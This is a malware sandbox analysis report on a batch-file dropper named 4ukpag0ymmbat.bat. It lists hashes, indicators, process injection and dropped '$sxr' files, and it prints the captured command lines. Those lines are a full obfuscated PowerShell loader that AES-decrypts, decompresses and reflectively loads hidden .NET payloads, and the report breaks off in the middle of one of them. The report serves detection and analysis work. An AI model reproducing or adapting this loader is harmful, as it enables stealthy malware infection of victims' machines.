Analysis
-
max time kernel
61s -
max time network
63s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
05-07-2023 11:34
Static task
static1
Behavioral task
behavioral1
Sample
4ukpag0ymmbat.bat
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
4ukpag0ymmbat.bat
Resource
win10v2004-20230703-en
General
-
Target
4ukpag0ymmbat.bat
-
Size
12.7MB
-
MD5
a6eb306f1a365c355e0db7cf5516019c
-
SHA1
3825d2a7c41c8c8ed6d646741ad42343d94fa5de
-
SHA256
4e1e20c34301d329fb9f36d346464ef839dc9619646c5f3c26d7510e9ca51811
-
SHA512
2ea9ffdfed9bad624e235022b011fb76bb4270c73a564ce11e130b6005cfa63b93b7d9c9931afebc213bf4ad20e493d0405a457e3a58aa84bdd5a646596d0412
-
SSDEEP
49152:+FgeGtxeM/etcJW4EQsw9n/udfp1V7HlAQ5uYv0JIloBhA20R0VEflHvfrM2+nxn:T
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4296 created 640 4296 4ukpag0ymmbat.bat.exe 3 PID 4444 created 640 4444 $sxr-powershell.exe 3 -
Executes dropped EXE 3 IoCs
pid Process 4296 4ukpag0ymmbat.bat.exe 4444 $sxr-powershell.exe 3452 $sxr-powershell.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\System32\vcruntime140_1d.dll 4ukpag0ymmbat.bat.exe File created C:\Windows\System32\vcruntime140d.dll 4ukpag0ymmbat.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll 4ukpag0ymmbat.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll 4ukpag0ymmbat.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll 4ukpag0ymmbat.bat.exe File created C:\Windows\System32\ucrtbased.dll 4ukpag0ymmbat.bat.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4296 set thread context of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4444 set thread context of 2652 4444 $sxr-powershell.exe 85 -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-powershell.exe 4ukpag0ymmbat.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe 4ukpag0ymmbat.bat.exe File created C:\Windows\$sxr-mshta.exe 4ukpag0ymmbat.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe 4ukpag0ymmbat.bat.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 4296 4ukpag0ymmbat.bat.exe 4296 4ukpag0ymmbat.bat.exe 4296 4ukpag0ymmbat.bat.exe 3604 dllhost.exe 3604 dllhost.exe 3604 dllhost.exe 3604 dllhost.exe 4296 4ukpag0ymmbat.bat.exe 4296 4ukpag0ymmbat.bat.exe 4444 $sxr-powershell.exe 4444 $sxr-powershell.exe 4444 $sxr-powershell.exe 4444 $sxr-powershell.exe 2652 dllhost.exe 2652 dllhost.exe 2652 dllhost.exe 2652 dllhost.exe 4444 $sxr-powershell.exe 4444 $sxr-powershell.exe 3452 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4296 4ukpag0ymmbat.bat.exe Token: SeDebugPrivilege 4296 4ukpag0ymmbat.bat.exe Token: SeDebugPrivilege 3604 dllhost.exe Token: SeDebugPrivilege 4444 $sxr-powershell.exe Token: SeDebugPrivilege 4444 $sxr-powershell.exe Token: SeDebugPrivilege 2652 dllhost.exe Token: SeDebugPrivilege 3452 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3836 wrote to memory of 3480 3836 cmd.exe 80 PID 3836 wrote to memory of 3480 3836 cmd.exe 80 PID 3480 wrote to memory of 1328 3480 net.exe 81 PID 3480 wrote to memory of 1328 3480 net.exe 81 PID 3836 wrote to memory of 4296 3836 cmd.exe 82 PID 3836 wrote to memory of 4296 3836 cmd.exe 82 PID 4296 wrote to memory of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4296 wrote to memory of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4296 wrote to memory of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4296 wrote to memory of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4296 wrote to memory of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4296 wrote to memory of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4296 wrote to memory of 3604 4296 4ukpag0ymmbat.bat.exe 83 PID 4296 wrote to memory of 4444 4296 4ukpag0ymmbat.bat.exe 84 PID 4296 wrote to memory of 4444 4296 4ukpag0ymmbat.bat.exe 84 PID 4444 wrote to memory of 2652 4444 $sxr-powershell.exe 85 PID 4444 wrote to memory of 2652 4444 $sxr-powershell.exe 85 PID 4444 wrote to memory of 2652 4444 $sxr-powershell.exe 85 PID 4444 wrote to memory of 2652 4444 $sxr-powershell.exe 85 PID 4444 wrote to memory of 2652 4444 $sxr-powershell.exe 85 PID 4444 wrote to memory of 2652 4444 $sxr-powershell.exe 85 PID 4444 wrote to memory of 2652 4444 $sxr-powershell.exe 85 PID 4444 wrote to memory of 3452 4444 $sxr-powershell.exe 86 PID 4444 wrote to memory of 3452 4444 $sxr-powershell.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:640
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{db4b3571-2cf9-4be0-91e2-bb848f1c638f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{cd68e5b2-48a4-44cf-9331-7ea286332c68}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bf3e22f8-5a0c-4733-83a7-e677acc1e62e}2⤵PID:3684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4ukpag0ymmbat.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:1328
-
-
-
C:\Users\Admin\AppData\Local\Temp\4ukpag0ymmbat.bat.exe"4ukpag0ymmbat.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function xKuue($cvXZS){ $uAvyf=[System.Security.Cryptography.Aes]::Create(); $uAvyf.Mode=[System.Security.Cryptography.CipherMode]::CBC; $uAvyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $uAvyf.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BCNQP2V2g5QVJ+KYVXfbsOlqSGQcI7crsDEaoGOxGzg='); $uAvyf.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8ezLrKD7ICNHucbi81JBAw=='); $LsnFR=$uAvyf.CreateDecryptor(); $return_var=$LsnFR.TransformFinalBlock($cvXZS, 0, $cvXZS.Length); $LsnFR.Dispose(); $uAvyf.Dispose(); $return_var;}function TNAcr($cvXZS){ $BWAiv=New-Object System.IO.MemoryStream(,$cvXZS); $nGKHJ=New-Object System.IO.MemoryStream; $QAMUv=New-Object System.IO.Compression.GZipStream($BWAiv, [IO.Compression.CompressionMode]::Decompress); $QAMUv.CopyTo($nGKHJ); $QAMUv.Dispose(); $BWAiv.Dispose(); $nGKHJ.Dispose(); $nGKHJ.ToArray();}function Zcsld($cvXZS,$XETSX){ $OMpUu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$cvXZS); $OBqgH=$OMpUu.EntryPoint; $OBqgH.Invoke($null, $XETSX);}$CQwfD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\4ukpag0ymmbat.bat').Split([Environment]::NewLine);foreach ($LuQZM in $CQwfD) { if ($LuQZM.StartsWith(':: ')) { $pRzKy=$LuQZM.Substring(4); break; }}$ZGtBs=[string[]]$pRzKy.Split('\');$RIKPL=TNAcr (xKuue ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZGtBs[0])));$mHTWH=TNAcr (xKuue ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZGtBs[1])));Zcsld $mHTWH (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Zcsld $RIKPL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function FeRTh($HXgng){ $yPrvu=[System.Security.Cryptography.Aes]::Create(); $yPrvu.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yPrvu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yPrvu.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74='); $yPrvu.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ=='); $ozdvl=$yPrvu.('rotpyrceDetaerC'[-1..-15] -join '')(); $QqwZx=$ozdvl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HXgng, 0, $HXgng.Length); $ozdvl.Dispose(); $yPrvu.Dispose(); $QqwZx;}function WViRv($HXgng){ $YGBzm=New-Object System.IO.MemoryStream(,$HXgng); $jYIbD=New-Object System.IO.MemoryStream; $xcmrz=New-Object System.IO.Compression.GZipStream($YGBzm, [IO.Compression.CompressionMode]::Decompress); $xcmrz.CopyTo($jYIbD); $xcmrz.Dispose(); $YGBzm.Dispose(); $jYIbD.Dispose(); $jYIbD.ToArray();}function rVIYY($HXgng,$jMUqG){ $jddfa=[System.Reflection.Assembly]::Load([byte[]]$HXgng); $YsjKF=$jddfa.EntryPoint; $YsjKF.Invoke($null, $jMUqG);}$yPrvu1 = New-Object System.Security.Cryptography.AesManaged;$yPrvu1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yPrvu1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yPrvu1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74=');$yPrvu1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ==');$fpmZa = $yPrvu1.('rotpyrceDetaerC'[-1..-15] -join '')();$JyAEw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lp2kWRB1AxxhQQxT2T/myw==');$JyAEw = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw, 0, $JyAEw.Length);$JyAEw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw);$zICHN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jn4NRQnkXYsl32Is+gg282WYBV0gagQ8MS1zRX22bgg=');$zICHN = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zICHN, 0, $zICHN.Length);$zICHN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zICHN);$PwBzY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('J4DBSZhy9WFLrb/1V51eyg==');$PwBzY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PwBzY, 0, $PwBzY.Length);$PwBzY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PwBzY);$ViPXZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Mngehtp8iodkWphbkv4O6bqqvVMYeaUBYE2GJl50V6etuzFjoRRuotg5XiU3e8WmsmDhGnw89pJBVUBHjU4i1es/B2PmJyRQwK1PIIN6gbzxSX5wjB01VBkOTsDBG3G3UcM/hppjRUNTLA1Yxd1AHEb4Yg6evSxTpdx06BQYZsZdV1dEf4tfvt7VVllQi9Ye+b84zgPgj5/9EC7+lW3dOZyDrDUYEdlfFh9qkhA5/VwBMXwF9RMLl34/Yj7CnGrZxmiSr4VBkntou0+LpYwWiwO4PwsrVjQ/k7UmOrsZPblLazM18OrudS00RE6eNn7jY8cmwFaY/nTaeA+ccauwSD5IwDbYac+o3a6AAs/W5I/FMXGX2kHwDmSuJKxyRl/K+WxJzYOOrZ2BVa3+r6iGP2RTsQJlEl0jhfHlfyaW/Mc=');$ViPXZ = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ViPXZ, 0, $ViPXZ.Length);$ViPXZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ViPXZ);$IYENY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K499VrtyV2xFPV/zXnv15g==');$IYENY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IYENY, 0, $IYENY.Length);$IYENY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IYENY);$kbSkm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sjAbZBmdzHyZ4gASywrfrA==');$kbSkm = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kbSkm, 0, $kbSkm.Length);$kbSkm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kbSkm);$syIIo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VKKOXMQZ/zV0G5qEGBUgfw==');$syIIo = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($syIIo, 0, $syIIo.Length);$syIIo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($syIIo);$rPSDY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ki2C3gbWjSZLPKsqQkfSdw==');$rPSDY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rPSDY, 0, $rPSDY.Length);$rPSDY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rPSDY);$YuyAr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C4fL+c9eyB+9jofj2XzjbA==');$YuyAr = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YuyAr, 0, $YuyAr.Length);$YuyAr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YuyAr);$JyAEw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MoJGuhZjvPaJuNT5m/GgeA==');$JyAEw0 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw0, 0, $JyAEw0.Length);$JyAEw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw0);$JyAEw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SAtN3BN3JH39yxeA0GX4Mg==');$JyAEw1 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw1, 0, $JyAEw1.Length);$JyAEw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw1);$JyAEw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jyvbBdj3J2Z9oSuZbaacg==');$JyAEw2 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw2, 0, $JyAEw2.Length);$JyAEw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw2);$JyAEw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mL0ZKAT5Ow8D5SQlehR9KA==');$JyAEw3 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw3, 0, $JyAEw3.Length);$JyAEw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw3);$fpmZa.Dispose();$yPrvu1.Dispose();if (@(get-process -ea silentlycontinue $JyAEw3).count -gt 1) {exit};$vQtde = [Microsoft.Win32.Registry]::$rPSDY.$syIIo($JyAEw).$kbSkm($zICHN);$KezyP=[string[]]$vQtde.Split('\');$lFPvG=WViRv(FeRTh([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KezyP[1])));rVIYY $lFPvG (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$jYxZq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KezyP[0]);$yPrvu = New-Object System.Security.Cryptography.AesManaged;$yPrvu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yPrvu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yPrvu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74=');$yPrvu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ==');$ozdvl = $yPrvu.('rotpyrceDetaerC'[-1..-15] -join '')();$jYxZq = $ozdvl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jYxZq, 0, $jYxZq.Length);$ozdvl.Dispose();$yPrvu.Dispose();$YGBzm = New-Object System.IO.MemoryStream(, $jYxZq);$jYIbD = New-Object System.IO.MemoryStream;$xcmrz = New-Object System.IO.Compression.GZipStream($YGBzm, [IO.Compression.CompressionMode]::$JyAEw1);$xcmrz.$YuyAr($jYIbD);$xcmrz.Dispose();$YGBzm.Dispose();$jYIbD.Dispose();$jYxZq = $jYIbD.ToArray();$LWzZt = $ViPXZ | IEX;$jddfa = $LWzZt::$JyAEw2($jYxZq);$YsjKF = $jddfa.EntryPoint;$YsjKF.$JyAEw0($null, (, [string[]] ($PwBzY)))3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4444).WaitForExit();[System.Threading.Thread]::Sleep(5000); function FeRTh($HXgng){ $yPrvu=[System.Security.Cryptography.Aes]::Create(); $yPrvu.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yPrvu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yPrvu.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74='); $yPrvu.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ=='); $ozdvl=$yPrvu.('rotpyrceDetaerC'[-1..-15] -join '')(); $QqwZx=$ozdvl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HXgng, 0, $HXgng.Length); $ozdvl.Dispose(); $yPrvu.Dispose(); $QqwZx;}function WViRv($HXgng){ $YGBzm=New-Object System.IO.MemoryStream(,$HXgng); $jYIbD=New-Object System.IO.MemoryStream; $xcmrz=New-Object System.IO.Compression.GZipStream($YGBzm, [IO.Compression.CompressionMode]::Decompress); $xcmrz.CopyTo($jYIbD); $xcmrz.Dispose(); $YGBzm.Dispose(); $jYIbD.Dispose(); $jYIbD.ToArray();}function rVIYY($HXgng,$jMUqG){ $jddfa=[System.Reflection.Assembly]::Load([byte[]]$HXgng); $YsjKF=$jddfa.EntryPoint; $YsjKF.Invoke($null, $jMUqG);}$yPrvu1 = New-Object System.Security.Cryptography.AesManaged;$yPrvu1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yPrvu1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yPrvu1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74=');$yPrvu1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ==');$fpmZa = $yPrvu1.('rotpyrceDetaerC'[-1..-15] -join '')();$JyAEw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lp2kWRB1AxxhQQxT2T/myw==');$JyAEw = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw, 0, $JyAEw.Length);$JyAEw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw);$zICHN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jn4NRQnkXYsl32Is+gg282WYBV0gagQ8MS1zRX22bgg=');$zICHN = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zICHN, 0, $zICHN.Length);$zICHN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zICHN);$PwBzY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('J4DBSZhy9WFLrb/1V51eyg==');$PwBzY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PwBzY, 0, $PwBzY.Length);$PwBzY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PwBzY);$ViPXZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Mngehtp8iodkWphbkv4O6bqqvVMYeaUBYE2GJl50V6etuzFjoRRuotg5XiU3e8WmsmDhGnw89pJBVUBHjU4i1es/B2PmJyRQwK1PIIN6gbzxSX5wjB01VBkOTsDBG3G3UcM/hppjRUNTLA1Yxd1AHEb4Yg6evSxTpdx06BQYZsZdV1dEf4tfvt7VVllQi9Ye+b84zgPgj5/9EC7+lW3dOZyDrDUYEdlfFh9qkhA5/VwBMXwF9RMLl34/Yj7CnGrZxmiSr4VBkntou0+LpYwWiwO4PwsrVjQ/k7UmOrsZPblLazM18OrudS00RE6eNn7jY8cmwFaY/nTaeA+ccauwSD5IwDbYac+o3a6AAs/W5I/FMXGX2kHwDmSuJKxyRl/K+WxJzYOOrZ2BVa3+r6iGP2RTsQJlEl0jhfHlfyaW/Mc=');$ViPXZ = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ViPXZ, 0, $ViPXZ.Length);$ViPXZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ViPXZ);$IYENY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K499VrtyV2xFPV/zXnv15g==');$IYENY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IYENY, 0, $IYENY.Length);$IYENY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IYENY);$kbSkm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sjAbZBmdzHyZ4gASywrfrA==');$kbSkm = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kbSkm, 0, $kbSkm.Length);$kbSkm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kbSkm);$syIIo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VKKOXMQZ/zV0G5qEGBUgfw==');$syIIo = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($syIIo, 0, $syIIo.Length);$syIIo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($syIIo);$rPSDY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ki2C3gbWjSZLPKsqQkfSdw==');$rPSDY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rPSDY, 0, $rPSDY.Length);$rPSDY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rPSDY);$YuyAr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C4fL+c9eyB+9jofj2XzjbA==');$YuyAr = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YuyAr, 0, $YuyAr.Length);$YuyAr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YuyAr);$JyAEw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MoJGuhZjvPaJuNT5m/GgeA==');$JyAEw0 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw0, 0, $JyAEw0.Length);$JyAEw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw0);$JyAEw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SAtN3BN3JH39yxeA0GX4Mg==');$JyAEw1 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw1, 0, $JyAEw1.Length);$JyAEw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw1);$JyAEw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jyvbBdj3J2Z9oSuZbaacg==');$JyAEw2 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw2, 0, $JyAEw2.Length);$JyAEw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw2);$JyAEw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mL0ZKAT5Ow8D5SQlehR9KA==');$JyAEw3 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw3, 0, $JyAEw3.Length);$JyAEw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw3);$fpmZa.Dispose();$yPrvu1.Dispose();if (@(get-process -ea silentlycontinue $JyAEw3).count -gt 1) {exit};$vQtde = [Microsoft.Win32.Registry]::$rPSDY.$syIIo($JyAEw).$kbSkm($zICHN);$KezyP=[string[]]$vQtde.Split('\');$lFPvG=WViRv(FeRTh([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KezyP[1])));rVIYY $lFPvG (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$jYxZq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KezyP[0]);$yPrvu = New-Object System.Security.Cryptography.AesManaged;$yPrvu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yPrvu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yPrvu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74=');$yPrvu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ==');$ozdvl = $yPrvu.('rotpyrceDetaerC'[-1..-15] -join '')();$jYxZq = $ozdvl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jYxZq, 0, $jYxZq.Length);$ozdvl.Dispose();$yPrvu.Dispose();$YGBzm = New-Object System.IO.MemoryStream(, $jYxZq);$jYIbD = New-Object System.IO.MemoryStream;$xcmrz = New-Object System.IO.Compression.GZipStream($YGBzm, [IO.Compression.CompressionMode]::$JyAEw1);$xcmrz.$YuyAr($jYIbD);$xcmrz.Dispose();$YGBzm.Dispose();$jYIbD.Dispose();$jYxZq = $jYIbD.ToArray();$LWzZt = $ViPXZ | IEX;$jddfa = 